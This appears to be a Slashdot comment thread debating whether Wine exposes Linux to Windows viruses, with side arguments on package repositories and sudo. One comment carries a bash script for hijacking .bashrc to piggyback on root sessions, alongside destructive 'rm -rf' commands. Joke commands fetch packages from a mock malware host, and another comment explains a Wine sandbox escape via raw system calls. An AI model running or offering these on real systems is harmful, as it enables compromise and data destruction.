So there are far fewer viruses for Mac OS X and Linux. It's true that those two operating systems do not have monopoly numbers, though in some industries they have substantial numbers of users. But even if Linux becomes the dominant desktop computing platform, and Mac OS X continues its growth in businesses and homes, these Unix-based OS's will never experience all of the problems we're seeing now with email-borne viruses and worms in the Microsoft world. Why?

----------------
Granted, that article is 6 years old - but you'll be hard pressed to come up with the numbers you give for Linux OR for Windows. I think that it's safe to say that there aren't 800 viruses - real working viruses - for all of open source. Again, I say, citations or it isn't so.

Re:marketshare

[DavidTC]

Unless, unlike Windows, they haven't been trained into constantly downloading and installing things.

That, right there, that mindset, is the only way to keep computers safe...having people know that the way to install things is to launch the 'application manager' and have a nice interface come up with all the applications they can install.

This should not prompt for a password in any way, either. If on a computer set up as a single user the user wants to install or remove openoffice from it, they should be able to to just do so.

Likewise, a URL scheme to 'add a repository' should be created, so users can click on links in web pages launch the application manager, and check to make sure the repository is one of the known-good third party ones (Which should be easy to register for, but would still create a rather large barrier for malware.) and add it and open it.

And all this should be totally unable to access any system software at all, which would need a root password to install or uninstall, and which users should never need to use.

Get people doing this, have people know that this is how you install programs, you don't download things and then double click on them and enter a password, and you've removed most of the idiocy of manual virus infections. Don't even let them do that. Luckily, programs download with incorrect permissions, but don't let them do it to .deb or .rpm either...the thing they should download is a URL of a repository, which gets checked before being used with a master list of known good ones, and which they cannot click 'okay', or even enter a root password, to use if it's not on the list. (Instead, they have to go do a bunch of manual steps, so that software distributors don't have them do that.)

Likewise, almost all system settings, like configuring the network, should not require root privs, unless someone's specially set it that way. Make it where people think having to enter a root password is a weird thing they have to do when changing their antivirus or upgrading to the next version of their OS, not something they need to do when installing Flash.

Re:marketshare

[bhtooefr]

Not to mention, dancing bunnies subverts any security system put in place, that the end user is allowed to modify.

Malware: "Please modify your SELinux policies to allow the Dancing Bunnies to run."
User: *modifies policies*

Short of an antimalware program alerting the user that the dancing bunnies are actually malware, nothing will stop the user from installing the dancing bunnies. NOTHING.

Re:marketshare

[kimb]

There are no know viruses currently available for Linux in the wild.
The last one was in 1989.

:)

Re:marketshare

[fluffy99]

User: *modifies policies*

Any user who actually knows how to modify the policies (as opposed to simply disabling) is not likely to fall for the dancing bunnies scheme. Modifying or writing selinux policies is far from intuitive or easy for the average luser to accomplish.

Re:marketshare

[marciot]

Restricting malware to user space only makes sense in a multiuser system. If you're an individual non-tech savvy home user, and your own account got infected with a keylogger, your identity would be stolen even if the Administrator account and system files remained pristine and untouched. The only thing you would gain by sandboxing the user on a single-user machine would be the ability for a service technician to rid the system of malware by delete that account and recreating it.

Re:marketshare

[hesaigo999ca]

>The idea of multiuser is to protect one user from another.
All this is thrown out the window as soon as the user installing the malware asking him for the root password, gives it to him, and then the malware proceeds to install itself everywhere in every account on the pc.

Re:marketshare

[Runaway1956]

OK, I'm not a linux guru, by any means. But, I don't see how a keylogger is going to be installed on a Linux box, without finding some other exploit to put it there. Weak password, and physical access maybe. I don't see some script kiddie, or even a semi-competent hacker doing it. And, a real hacker isn't likely to waste his time. The single bot-like exploit in the wild (that I'm aware of) for Linux machines relies on a weak password, and a poor security policy within an application. (I think it's a database app - to lazy to go look right now)

The most likely means of getting even a non-tech single user's personal data is by phishing the data from him. Linux is just as prone to phishing and/or MIM attacks as Windows is. I've also had my browser hijacked a couple of times - once rickrolled, and once by a fraudulent antivirus which found infections on my nonexistent C drive. But, in both cases, I killed the browser, restarted it, did a virus scan, and came up clean.

Granted, as Linux becomes more popular, more people are going to be trying to exploit it. But, the other side of the same coin is, more people are working to secure it as well. SELinux has documented exploits, so GRSecurity has come into existence for the purpose of securing Linux again. The non-tech user isn't likely to install either SELinux or GRSecurity - but if he's relying on someone for tech support, the techie is probably going to do it for him.

Exploits evolve, and so does prevention.

Re:marketshare

[DaVince21]

User: "Oooh, I can download this to see dancing bunnies." *downloads and executes malware*
Malware: *tries to install*
OS: "Malware needs root access to install. Please enter your root password." (Windows version of this would be "Cancel or Allow.")
Not Completely Stupid User: Well, nevermind then.
Malware: *Oh damn :(*

Re:marketshare

[bhtooefr]

Problem is, even on Linux, users are conditioned to enter their root password to install things that they want to install.

And, it doesn't have to be dancing bunnies. It could be some tool that the user is looking for to do something they need.

Re:marketshare

[DaVince21]

Yes, in that case there might be a security liability. However, this is what package repositories are for.

In the end, it's always the user who has to be careful.

Re:marketshare

[Happy-R-BOB]

I was always given to understand that when it comes to Wine in Linux the trick to containing Windows virus infections revolves around ROOT. If the "fake" windows install is infected it will run the virus or try to. But this should only become a problem for the actual Linux system should wine be running with root privileges. That is what I've always understood though i admit to being a relative novice in Linux still.

However that said I don't know enough of the nuts and bolts, I would suppose that might only apply to virus that is attempting to hijack the Linux system specifically. I'm guessing it might be possible for the windows virus to work with in the confines of wine and request access to the Linux resources in the same way as say an online game in wine gets access to the internet.

Re:marketshare

[gregorio]

Unless, unlike Windows, they haven't been trained into constantly downloading and installing things. That, right there, that mindset, is the only way to keep computers safe...having people know that the way to install things is to launch the 'application manager' and have a nice interface come up with all the applications they can install.

Except that such system would never appeal to the masses. People don't want a system with a "list of apps that thet can install". They want a true OS, not a fixed, centrally-mantained toolkit.

The users WANT to be able to run random, not-distro-managed apps.

Re:marketshare

[DavidTC]

25% of 'the masses' just want a web browser, an email client, an office suite that can read their files, and maybe an MP3 player.

Another 25% also want an IM client, Google Earth, torrent client, rss reader, other random small pieces of software. All of which comes with Linux too.

And another 25% of the public would want to add software from several large publishers, like Adobe or EA or even Microsoft or whatever, people who could easily register their repository with a master list. (We're not debating the availability of software in some hypothetical Linux future, we're debating if having repository as the sole source would work.)

If you don't use Linux, you're probably not aware that most producers of free Linux software who don't get included in distributions already put their packages in repositories for download.

You have somehow misunderstood what I said to mean that the distros would be in charge of what is made available. No. The distro would just take minimum steps to determine that a repository is moderately legitimate and has some sort of company or actual real person behind it, and stick it on a list of 'places you can add to your software list by clicking on a link'. (Heck, some sort of delayed automatic entry would probably be workable. If they can submit their name, and have an SSL cert and a domain name and respond to an automatic email and phone call and actually remain up for a week, they're probably not malware and we can let people tentatively download from that repository. And just blacklist them if we were wrong...and, while we're at it, pop up messages about malicious software on users machines who added that repository the next time they update their master list.)

Sorta like Authenticode from Microsoft is supposed to work, but does not, because software publishers can't afford it.

Now, there is the question of what to do with store purchases. Frankly, I'd be okay with just allowing installs off a CD...asking people to download malicious ISOs and then burn them to a CD to install them have a high enough 'weird' factor that people are unlikely to normally fall for it. (And if you can get people to do that, you can get them to boot off said CD, which the OS can't protect from anyway.)

And the other 25% of Linux users can turn the damn feature off and install from anywhere they want. The point is what average users are trained to do to install software, not what people can do.

On Linux, users should install software by opening their 'software installer' and searching for what they want, or by sticking a CD in the drive, which should pop up their installer listing software on that CD, or clicking a link in a web page, which pops up their software installer with software in that repository. The first already is true, the middle is easy enough to do but usually done different, and the last is trivially easy to implement.

And all of them are safer than on a Windows system, where almost all the software (Except purchased in stores) is installed via the exact same way that malware is installed...downloaded and run. If you a) Don't have people install legit software that way, and b) don't let people easily install malware that way without a lot of strange steps, you've essentially totally stopped people from installing malware. Microsoft thinks you can just do 'b' without 'a', but adding steps that all software installs require means people will learn to happily do them for malware also.

It doesn't matter what is possible outside the norm. Outside the norm, on Windows or Linux, people could run fdisk and unpartition their computer, or delete their startup files, both of which processes are as destructive as malware...but people aren't trained to do that normally, whereas, on Windows, they are trained in the process to install malware when they install legit software, and, thinking malware is legit software, they follow exactly those steps. Whereas, on Linux, those steps differ, and they could easily differ even more.

Re:marketshare

[bhtooefr]

Except the entire point of the dancing bunnies problem is that the user will throw caution to the wind, and download something not in the repositories, from an untrusted source.

Re:marketshare

[triso]

Yeah ... but dancing bunnies .... it is a tough call.

Hey! If it isn't "dancing bunnies" it is "jiggling boobs." Now that's a tough call.

Re:marketshare

[triso]

...
(And if you think Linux servers don't have malware, I have some nice beachfront property in Montana that I can sell you at a great discount.)

What there isn't yet, for Linux, is malware that busts the entire server wide open; like almost every malware does to Windows.

Re:marketshare

[gmack]

They do both really. I can't tell you how nasty "porn access software" can be to remove sometimes.

Re:marketshare

[gregorio]

25% of 'the masses' just want a web browser, an email client, an office suite that can read their files, and maybe an MP3 player. Another 25% also want an IM client, Google Earth, torrent client, rss reader, other random small pieces of software. All of which comes with Linux too.

That's easy to quote...
...today. Those applications only appeal to the masses today because they were introduced to the userbase using an OS that allowed people to (easily) install random apps. What will be the famous / fashionable apps of tomorrow?

And another 25% of the public would want to add software from several large publishers, like Adobe or EA or even Microsoft or whatever, people who could easily register their repository with a master list. (We're not debating the availability of software in some hypothetical Linux future, we're debating if having repository as the sole source would work.)

Sure. If you make it hard / long-and-boring to add other repositories, Linux will still be a member of the failbucket of OSes. If you make it really easy (such as "click here and temporarily add our repo. and install any software you want on a single click"), you just made Linux join the Easy Virus And Trojan Club.

And there is no miracle that will keep users from inserting their root passwords at the cute dialogs or keep limited user trojans from sending mails and accessing important USER (what kind of thief cares about boring OS files anyway?) files.

You can't have your cake and eat it too.

Re:marketshare

[DavidTC]

Sure. If you make it hard / long-and-boring to add other repositories, Linux will still be a member of the failbucket of OSes. If you make it really easy (such as "click here and temporarily add our repo. and install any software you want on a single click"), you just made Linux join the Easy Virus And Trojan Club.

Did you not actually read what I said?

You make it easy to add repositories which are on a whitelist that the distro maintains.

It's not damn rocket science. They want to add a repository, you check first to see if it's an allowed repository. Christ. That's my entire fucking point.

Pretty much any repository that had an actual real person or company behind it would be whitelisted.

And there is no miracle that will keep users from inserting their root passwords at the cute dialogs

Um, yes, there is. Namely, if they don't have to put in their root password for anything else, they just might get a little suspicious if they have to pull it out for malware.

I love the idea that people just do random things to operate their computer.

No, they are taught how to operate their computer. In Windows, they are taught to download and run, with admin permissions, the flash installer, or the Silverlight installer, or the Skype installer, or the malware installer, or RSS reader installer, or the...hey, wait, what was that one before the last one again?

If you don't teach them that's how you install programs, they don't install programs that way, and look askew at any programs that says they should be installed that way.

or keep limited user trojans from sending mails and accessing important USER (what kind of thief cares about boring OS files anyway?) files.

Except that user trojans (Which they'd have to manually change the permissions on to launch in the first place.) would be much much much easier to clean up via antivirus software.

We wouldn't have a race to get antivirus updates out before a virus got in into the system, like on Windows, where viruses get in and embed themselves so deeply that two hours later, when new antivirus definitions comes out, the antivirus can no longer find the virus, and has, in fact, been totally disabled by said virus.

I swear, it's like no one here has any knowledge of how antivirus works at all, and is incapable of reading what I actually type. Malicious programs that run under a single user account are trivial to clean up, a hell of a lot easier to clean up than the rootkit infections that cripple Windows. You could even reboot the computer into an 'antivirus mode' where no user programs get executed at all. (You know, sorta like safe mode is supposed to work, except that none of the trojans on Windows are running under user accounts or via the normal startup, but have instead inserted themselves as system files.)

Re:marketshare

[gregorio]

You make it easy to add repositories which are on a whitelist that the distro maintains. It's not damn rocket science. They want to add a repository, you check first to see if it's an allowed repository. Christ. That's my entire fucking point. Pretty much any repository that had an actual real person or company behind it would be whitelisted.

Oh, that a nice, real-world solution: a central you-can - you-can't list. That's really going to work after 70% of the fashionable apps of the moment are still waiting in the debian repository approval queue. What about closed-source software? Will most distros include Adobe at the allowed list?.

And how are you going to prevent runnable Java applets (what the hell, even Firefox allows full-permission Java deployment these days) that will simply ask the user for the root password? Will you forbid running apps inside the user folder? Good luck with that, you just removed the Personal out of the PC. "What do you mean I can't run CuteBunnyGame? I'm going back to Windows, sorry."

You're still swimming in the failbucket, sorry.

Um, yes, there is. Namely, if they don't have to put in their root password for anything else, they just might get a little suspicious if they have to pull it out for malware. I love the idea that people just do random things to operate their computer. No, they are taught how to operate their computer. In Windows, they are taught to download and run, with admin permissions, the flash installer, or the Silverlight installer, or the Skype installer, or the malware installer, or RSS reader installer, or the...hey, wait, what was that one before the last one again? If you don't teach them that's how you install programs, they don't install programs that way, and look askew at any programs that says they should be installed that way.

You seem to be the failbucket administrator. All of your ideas are complete consumer turn-offs. Teach them? Who is going to teach them? The product vendor, who needs the user for profit / religious reasons? Are you serious? I can even imagine the box: "Warning, this product is not suitable for idiot users like you who will insert their root passwords at any time asked. Please GTFO, RTFM and learn how to secure your computer before using this product".

People won't learn because they don't want to and most of the time they simply can't. And they don't give the root password to anyone because Windows taught them, they give it to anyone because they want to install CuteBunnyGame and CuteBunnyGame is asking for their password. They paid for their computer and they WANT to run CuteBunnyGame.

You zealots simply don't get normal people. That's why you're all swimming wildly inside the failbucket.

I swear, it's like no one here has any knowledge of how antivirus works at all, and is incapable of reading what I actually type. Malicious programs that run under a single user account are trivial to clean up, a hell of a lot easier to clean up than the rootkit infections that cripple Windows. You could even reboot the computer into an 'antivirus mode' where no user programs get executed at all. (You know, sorta like safe mode is supposed to work, except that none of the trojans on Windows are running under user accounts or via the normal startup, but have instead inserted themselves as system files.)

Who cares? The biggest issue is getting infected in the first place, not if it is easy or not to clean it up. If your personal files are gone (or someone is requesting ransom for them) or your computer is part of a botnet, you have bigger things to worry about than "trust the antivirus" or "just reinstall the damn thing". Even worse: most knowledgeable users would not trust an infected machine.

It's like a what?

[cjfs]

A virus run in Wine is akin to taking a ferocious tiger out of the jungle, paralyzing it, then hooking up all of its nerve endings to virtual jungle simulator. It's not a perfect simulation, though, so the jungle maybe doesn't look right, and plus there's an omnipotent power that can change anything that goes on in the simulation, or even destroy it and the tiger's consciousness with a few twitches of his fingers. Now that's power.

Power that's generated by feeding the dead tigers back to other tigers so we can use their body heat to generate MORE POWER!

On second thought, lets stick to car analogies.

Linux's distribution model helps though

[brunes69]

The way Linux software is distributed, makes it much less likely to get a virus. You know how many applications I have downloaded from random websites in the past 2 years for my Linux system? Maybe, 2. All of the rest are in the centrally managed, (hopefully) certified virus-free application repository, which is free for all.

The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and moth others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.

Re:Linux's distribution model helps though

certified quite literally the repositories for most distros use package signing of some sort, so even mirrors of them are guaranteed to be unaltered.

Re:Linux's distribution model helps though

[cenc]

That is a big big difference in the MS software culture vs. linux or just open source in general. Software is signed, and from day one users are bombarded with notices about the package signing and instructions on how to use them. Until I started using open source, I don't remember ever once being told to checksum windows software before installing.

I have even on occasion grabbed torrents of distros from relatively shady torrent sites because they had more seeds or whatever closer to my home, unconcerned about the final download because I had the signature from a trusted source to check once it was down to insure it was for real. The simple checking culture makes malware infiltration difficult (although not impossible) in to open source software.

Re:Linux's distribution model helps though

[lukas84]

Then you're quite new to the Linux game.

Debian didn't sign anything for a long, long time. Or Slackware. Or Gentoo. Of course this has all been fixed by now, but Linux sure wasn't what started the whole "sign everything" trend.

While Windows has been displaying a lot of warnings with missing Authenticode signatures starting with Windows XP.

Re:Linux's distribution model helps though

[cenc]

I have never been a Debian user, but I have been using open source software for better than 10 years and I recall back then everything I was running being signed at least in Red Hat / rpm circles. I believe most things where signed because there was always the possibility of a download being corrupted from a flaky Internet connection, more than security concerns.

Re:Linux's distribution model helps though

[buchner.johannes]

You, and the majority of Linux users are delusional. You think malware is only executables. A glitch in any software package -- e.g. Firefox or OpenOffice -- would be enough to add a bash script to .bashrc (or replace the file). This can download and start all the software it wants, unless you set the /home partition noexec.
Another attack method would be to append a script to the GNOME startup applications.

Consider appending the following script to .bashrc (no one ever looks in there). Next time you go into your shell and do "sudo su - " or something similar, the script has root privileges (if you use sudo timeouts or no sudo password).
#!/bin/bash

MAXAGE=100

while sleep 10; do

        pgrep -f -U 0 -P $PPID,$$ && {
                # echo parent has a root owned child process
                id=$(pgrep -f -U 0 -P $PPID,$$ | head -n1)
                # wait $id
                age=$(($(date +%s) - $(stat /proc/$id/ -c '%Y')))
                if [ "$age" -lt "$MAXAGE" ]; then
                        # echo the child is young
                        # evil code here
                        sudo touch /root/you_were_hacked
                        # sudo rm -rf /etc/
                fi
        }
done &

With 10+ scripting languages on the average Linux install, the attacker has plenty of choices. Linux is only safer if you use a hardened kernel, SELinux, noexec partitions and read-only binary partitions. Crackers are already laughing about the upcoming, unworried lusers that think their OS is invulnerable.

Re:Linux's distribution model helps though

[techno-vampire]

Next time you go into your shell and do "sudo su - "

ROTFLMAO! You do realize, don't you, how redundant that is? If you have access to the root password (needed for "su -") there's no reason in the world for you to be using sudo. And, even if you did want to use sudo, why would you use it to switch user to root? Talk about doing things the hard way!

Re:Linux's distribution model helps though

[inode_buddha]

What makes you think I have sudo installed? For that matter, I *do* know what is in my .bashrc. I better darn well know that stuff.... anything that is going to start a shell instance is going to get my attention, or a log file.

Re:Linux's distribution model helps though

[BikeHelmet]

The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and moth others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.

Correct - as an educated computer user.

Although there are two scenarios you're forgetting. One is repository/domain hijacking, and the other is something not being available except from an unknown website.

Ex 1: PlayOnLinux (simplifies working with Wine and installing some software - not in the repositories)
Ex 2: BackInTime (Gnome) - website disappeared a few weeks back. Domain name available for purchase.

Anyway, as an educated Windows user, I would check review sites like cnet or betanews(or a download site like filehippo) to see if software is legit or if it's going to pwn me. Then I'd download it - possibly from those central not-really-a-repository locations.

I hope I've drawn the parallel that user education matters a bit more than the specific type of central download location. ;)

Re:Linux's distribution model helps though

[reub2000]

su when invoked by an admin doesn't need the users password. And sudo can be used to run su without ever getting the root password, so he's basically gotten a root shell only using the password associated with his own loggin. Of course, 'sudo -s' is a much simpler way to get a root shell.

Re:Linux's distribution model helps though

[techno-vampire]

Interesting. I did a bit of research (both on my box and on the net) and found nothing to substantiate this. However, when I tested it, it worked. Thank you. Live and learn...

Re:Linux's distribution model helps though

[dlgeek]

That's simply not true. When su is run as root, it's passwordless. It's very possible to be given root access via sudo but not have the root password. Thus, if you want a root shell (as opposed to running commands individually), sudo su - is the best way to do it.

Re:Linux's distribution model helps though

[donaldm]

Using "sudo" should only be used when delegating certain administration responsibilities to specific people and in the majority of cases should require a user password. When allowing "sudo" privileges a great deal of thought must always be given into what commands are going to be allowed and those commands should always be defined with their fully qualified path. You don't need "sudo" when you know the root password but "With great power comes great responsibility" (sorry could not resist).

Allowing users using "sudo" to run commands like "cp", "mv" and "rm" to name just a few is just plain stupid and I would suggest the System Admin who allowed that should be forced back to using MS windows :).

Here is a fix that will stop your script cold:

guest $ visudo
visudo: /etc/sudoers: Permission denied
visudo: /etc/sudoers: Permission denied

guest $ sudo rm -rf /
[sudo] password for guest:
guest is not in the sudoers file. This incident will be reported.

BTW the "guest" user did put in the correct password.

Re:Linux's distribution model helps though

[the_womble]

A hijacker would also have to forge signatures.

The other is a problem, but:

1) It tends to be obscure stuff than only slightly geeky users want (i..e. the sort of people who know how to check things)
2) It often comes with some way of checking (e.g. checksums) that you get the real download.
3) A user who has downloaded one app from an untrusted site is much less likely to have downloaded malware than someone who has downloaded fifty.

Re:Linux's distribution model helps though

[JackieBrown]

set .bashrc as read only or don't have one at all so it can use the systems version.

It is a lot easier to prevent attack in linux than in windows. No one is saying it is impossible to attack it though.

Re:Linux's distribution model helps though

[JackieBrown]

linux programs can be installed without root access to the users home. As far as hijacking a domain, unless they manage to sign all their packages the same as the Debian ones, it wouldn't really matter.

While I would not be happy if I installed a program that deleted or destroyed all my personal files, I at least know that my brother or wife installing a destructive program on their user won't destroy my files.

Re:Linux's distribution model helps though

[lukas84]

If it did, the next slashdot story would be "Microsoft prevents open source projects from running on Windows, unless they purchase an expensive Authenticode cert".

You can't both ways.

Re:Linux's distribution model helps though

[JBrandonS]

Simply not having a .bashrc would be a bad idea. A program could create one and if you didnt notice it would be executed. Best thing do do would be to chmod it readonly, or even better chown it to root:root and have it read only. That way a smart script cant even chmod it back.

Re:Linux's distribution model helps though

[namgge]

It's very possible to be given root access via sudo but not have the root password.

It's not just 'possible', that's almost the whole point of sudo.

namgge

Re:Linux's distribution model helps though

[buchner.johannes]

The point was that any (faulty) program can rewrite your .bashrc and schedule a script for a future run. There is no way of you knowing immediately.

Re:Linux's distribution model helps though

[buchner.johannes]

That is only true when you use different users for using the computer (e.g. guest) and administrating the computer (e.g. myfirstname). Which you -- and any default install of Linux -- don't do. The point of sudo is that you can use the same user to launch root commands. The rest of your comment is just unrelated blah.

Re:Linux's distribution model helps though

[buchner.johannes]

yeah, but you don't have a login shell with sudo -s, just a normal shell.
man su:
              -, -l, --login
                      Provide an environment similar to what the user would expect had the user
                      logged in directly.
This effects env vars and landing in ~ instead of the wd.

Re:Linux's distribution model helps though

[dlgeek]

Well yes, but I can think of plenty of cases where I use sudo but still have the root password, mainly because sudo's syntax is nicer than su's.

Re:Linux's distribution model helps though

[inode_buddha]

And if you look at the man page for chattr (man chattr) you will see that you can set the "immutable bit"... "A file with the `i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to the file. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute." This could be usefull.... so no, a faulty program cannot just re-write bashrc or anything else, unless it has root privs, which itself is very unlikely.

Re:Linux's distribution model helps though

[skeeto]

One is repository/domain hijacking

Just to clear this up, the packages are signed so you don't have to trust that a repository isn't serving malware.

Re:Linux's distribution model helps though

[BikeHelmet]

Indeed.

But if the website came up and looked identical, but said the server had crashed, and the keys were lost - then provided new keys and the command to install them...

It's easy to get around security if the user isn't educated.

Re:Linux's distribution model helps though

[Vovk]

sudo -i will do the same thing as sudo su -

Just waiting for this e-mail

[fluch]

This is a lonesome linux virus. Please add

deb http://malware.server.ru/debian experimental non-free

to your /etc/apt/sources.list and excecute "apt-get my-first-virus" as root. Thank you very much vor your cooperation.

Re:Just waiting for this e-mail

[sakdoctor]

non-free?

I only install FLOSS malware.

Re:Just waiting for this e-mail

Me too, I won't compromise my freedom just to be part of a botnet.

Free alternative: http://www.gnu.org/fun/jokes/evilmalware.html

Re:Just waiting for this e-mail

[ozamosi]

This is a lonesome linux virus. Please add

deb http://malware.server.ru/debian experimental non-free

to your /etc/apt/sources.list and excecute "apt-get my-first-virus" as root. Thank you very much vor your cooperation.

Yeah, I run Fedora...

Re:Just waiting for this e-mail

[wizardforce]

Yeah, I run Fedora...

wget http://malware.server.ru/debian.deb

sudo alien -r debian.deb

Re:Just waiting for this e-mail

[furbearntrout]

..doesn't have alien

It can:

You will need:
alien.rpm
html2text.rpm
alien tarball
pwgen.deb(example)

Download and install the deb package (Debian package tools for Fedora) and the html2text package. Both of these are needed for alien to work correctly and do not come by default on Fedora, nor can they be found in standard yum repositories. You will need to use the RPM flag "--nodeps" in order to install. The software wants the alternatives package, which under Debian has a different name and is thus not found. However the Red Hat /Fedora alternatives will work just fine!

Alien is a Perl script in its current form. So it doesn't use the standard install methods for tar-balls. Instead you should read the directions in the "INSTALL" file, modified as shown below.

perl Makefile.PL
make PREFIX=/usr
su -c 'make PREFIX=/usr install'

Finally try it out:

$ man alien
$ alien --version
$ su
# alien --to-rpm pwgen*.deb
# rpm -Uvh pwgen*.rpm
# exit
$ pwgen

from:
content.hccfl.edu

Re:Just waiting for this e-mail

[techno-vampire]

to your /etc/apt/sources.list and excecute "apt-get my-first-virus" as root.

I tried, but got this:
bash: apt-get: command not found
AFAICT, Fedora 10 doesn't come with apt-get.

Re:Just waiting for this e-mail

[fluch]

Try

apt-get install apt-get

Ah, wait.. never mind.

Linux on a bender

What do you expect when Linux gets drunk on Wine and wakes up with Windows it's bound to have caught something.

Hooray!

[Greyfox]

It's like I used to not be able to get herpes, AIDS or the flu and NOW I CAN! Thanks, wine team!

That's the problem with Wine...

[Interoperable]

I always have to configure the programs so much before they run. It really defeats the purpose of a virus if I have to configure it so much first. Once Linux can run Windows viruses with a one-very-poorly-chosen-click install process I might make the switch. Besides, I can just run my FOSS software under Windows and still have access to all of the proprietary viruses that are only made for windows.

Re:That's the problem with Wine...

[Jesus_666]

That's why OS X is so much superior to Linux. OS X viruses come as bundles and are super easy to install - just open the disk image and drag the virus to your hard drive. Also, they're very clean as all the files they're ever going to infect come right with the virus binary itself in the bundle. It's truly the future of malware.

Executables under wine

[Psicopatico]

Didn't read TFA yet (already slashdotted?), but I think I've encountered one working "unwanted program" under Wine lately.

If I recall correctly, the vector was the setup or the program itself for a peer to peer TV system, which I wanted to try under wine.

Once launched, some unwanted processes kept popping out, and the command reported by ps was stuff like "wine C:\WINDOWS\TEMP\asasaazasdax.exe" or similar.
Suspect at first look.

Actually I don't remember which one between "killall wine" or "kill -KILL " solved the issue.

Re:Executables under wine

[TheRaven64]

It's not entirely surprising. You can protect yourself against Windows-designed malware by restricting the filesystem that WINE has access too, but that doesn't protect you against malware that is intended to be cross-platform. Once a program has used WINE as a loader, it can still issue Linux system calls directly (WINE can't catch system calls, only library calls) and break out of the WINE sandbox.

Linux?

[niko9]

Preface: I'm Debian GNU/Linux user of 10 years, but not a professional computer geek. I use GNU/Linux to get work done.

I thought Linux was just a kernel? Should not the headline read "A Linux distribution that has Wine installed *might* be vulnerable to Windows viruses?"

Re:Linux?

[Jimmy_Slimmy]

Mod me up, mod niko9 down.

Just kidding! I have been modded up plenty, have good karma! Although, I do not find niko9 interesting, I also do not have any points, for lo this many days. Almost like I was blacklisted. Huh.

Look to Apple users using VM

[Ilgaz]

If you look deeper to Apple users virtual machines (Sun Virtual Box etc.) , lots of them doesn't bother to install some free AV, a basic one saying "it is virtual anyway". When you talk about how evil things can be done while their virtual machine up and what kind of trouble they may get into if they have bad luck, they install a free AV to Windows.

If you have trouble convincing such people, just use plain logic: It can even run some games let alone a worm/trojan/virus.

It is not in the culture you know...

Re:Look to Apple users using VM

[EdIII]

You don't have to install a free AV if the machine reverts back to its initial state upon closing. I use several MS virtual machines and they are basically just tools. I choose not to commit any changes made during the session to disk.

If you take the extra step of operating the virtual machines on their own separate network space it makes it highly unlikely that a virus or malware program is going to be able to do much of anything before you destroy the virtual machine.

There is something to gain by doing this as well. None of the overhead, processing and bandwidth, are incurred when you don't have an AV installed.

Of course if you are saving changes in a virtual machine then you need to treat just like any other operating system and take the appropriate steps to secure it.

Re:Look to Apple users using VM

[Valdrax]

When you talk about how evil things can be done while their virtual machine up and what kind of trouble they may get into if they have bad luck, they install a free AV to Windows.

What kind of fool surfs the web through the VM when they have perfectly good native tools to use instead? It's not like this kind of web-downloaded trojan is going to affect someone using a VM unless they're trying to hurt themselves. Also, if you don't give your VM any sort of access to your local system outside of its sandbox, then no worries.

Of course, the only thing I use a VM to do is to play old DOS games, so maybe I'd be more vulnerable if I was the type of person who used it to run MS Office and *had* to give it access to the local system to be useful.

The only place...

[digitalderbs]

...you should be able to get a virus from wine is at church.

Re:The only place...

[corbettw]

All right Father, think it's time for you to leave the alter boys alone.

Re:The only place...

[mister_playboy]

It's the Blood of Christ, you insensitive clod!

Experiments

[Aquaseafoam]

I work as a sysadmin at a company making a slow switchover to Linux, and I've experimented with this a bit. You can greatly, greatly limit the damage any virus can cause through wine by unmapping it's Z drive from the wine configuration menu. By default, wine maps / to Z. I can see why they did this, (wine can only run applications within a mapped drive) but it likely needs to be undone across the board. The best alternative would be to create a unhidden wine folder in the user's home directory and map that in wine. If Z is left mapped to /, then a windows virus can run rampant all throughout your system.

Re:Experiments

[ElKry]

If Z is left mapped to /, then a windows virus can run rampant all throughout your system.

... with your current user's permissions. Which I grant you is bad enough.

Re:Experiments

[jedidiah]

The main problem is still "running amok" in /home. / won't get you much.

Re:Experiments

[TheRaven64]

A virus that is Linux-aware can escape from a WINE sandbox like this very easily. WINE handles Windows library calls, but it can not intercept system calls. If you put a Linux system call number into eax and issue interrupt 80h then you get a Linux system call, irrespective of whether it's a programme running with WINE or a native Linux program. Remember, WINE is not an emulator, it is just a loader and a set of libraries. It doesn't provide any sandboxing. WINE even provides a mechanism for allowing programs to detect if they are running under WINE, so if you can persuade a Linux user to run a program under WINE (or infect another program running under WINE) then you can do anything that the user can do. Unless, of course, you combine WINE with SELinux or some other real sandboxing mechanism.

Re:Experiments

[Kenz0r]

I'm a linux noob, but wouldn't using SELinux eliminate the entire problem?
Only give the files and folders you want Wine to access the corresponding SELinux context and nothing Wine does can hurt the rest of the system.

Re:Experiments

[VoltageX]

I'm interested - are you saying I could open() /etc/passwd from a wine instance?

Re:Experiments

[TheRaven64]

Assuming that the user has access t this, yes. If you call open(), then the WINE loader will fix up the address so that you are calling the WINE open() function, rather than the libc one. On Linux, however, open() is a wrapper around system call 5. If you put 5 in eax, a pointer to the filename in ebx, and the correct flags in ecx and edx, then issue interrupt 80h, then you will open the file. WINE doesn't run with any more privileges than the user (unless you've done something stupid, like set the setuid flag on the root-owned wine binary), so it can't access any files that the user can't access, but it can do anything that the user can. If you write a little assembly function that does this (or just copy it from glibc) and then link it into your Windows binary, then you can call it and get back the file descriptor. You'll also need to copy, at a minimum, wrappers around the read and write system calls.

Note that this kind of sandboxing would be much easier on a microkernel. With something like HURD, open() is serviced by a userspace program that the program communicates with via a Mach port. WINE could trivially run a daemon on such systems and have the loader replace the port reference to the system server with one to this daemon, which could validate things like this to ensure that they remained in the sandbox. Unfortunately, WINE can't use chroot, because it needs to be able to map several different drives. In theory, it could if you only wanted a single C: drive in ~/.wine/drive_c and no other drives (e.g. DVD/network). It might be nice for someone security conscious to create a distribution of WINE that was configured like this for running not-so-trusted Windows programs.

Re:Experiments

[Jeremy+Visser]

Given that Wine mounts Z: drive as your Unix / (by default, that is), you don't even need to go as far as the GP. Just open('Z:\etc\passwd').

Re:Experiments

[ninedragons1pearl]

Doesnt AppArmor prevent programs from accessing non required areas of the machine? Doesnt Wine apply?

Windows virus needs help to limp onto WINE

[AliasMarlowe]

So WINE can get a virus intended for Windows, if you jump through some hoops to help the virus along. Color me unworried.

